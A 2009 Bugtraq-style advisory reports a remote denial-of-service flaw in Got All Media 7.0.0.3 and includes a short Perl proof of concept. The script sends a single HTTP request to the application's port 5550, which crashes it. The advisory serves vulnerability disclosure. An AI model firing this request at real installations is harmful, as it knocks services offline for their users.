Written by LiquidWorm
Friday, 20 February 2009 20:10
Got All Media URI Handling Remote Denial of Service Vulnerability
-\\Bugtraq ID: 33830
-\\Class: Unknown
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Feb 19 2009 12:00AM
-\\Updated: Feb 20 2009 06:17PM
-\\Credit: LiquidWorm
-\\Vulnerable: Got All Media Got All Media 7.0 3
-\\Discussion: Got All Media is prone to a remote denial-of-service vulnerability when processing URI requests.
Exploiting this issue allows remote attackers to cause denial-of-service conditions by crashing the application.
Got All Media 7.0.0.3 is vulnerable; other versions may be affected as well.
-\\Exploit(s)/PoC(s): An attacker can use a browser to trigger this issue.
A proof of concept is available:
===============================================================
33830.pl
^^^^^^^^^
#!/usr/local/bin/perl
#
# Title: Got All Media 7.0.0.3 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
# http://www.zeroscience.org
# 19.02.2009
#

print "\n[*] t00ting...\n";

use LWP::Simple;

my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;
-\\Solution: Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
-\\Reference(s): Home Page: http://www.gallm.com (Got All Media)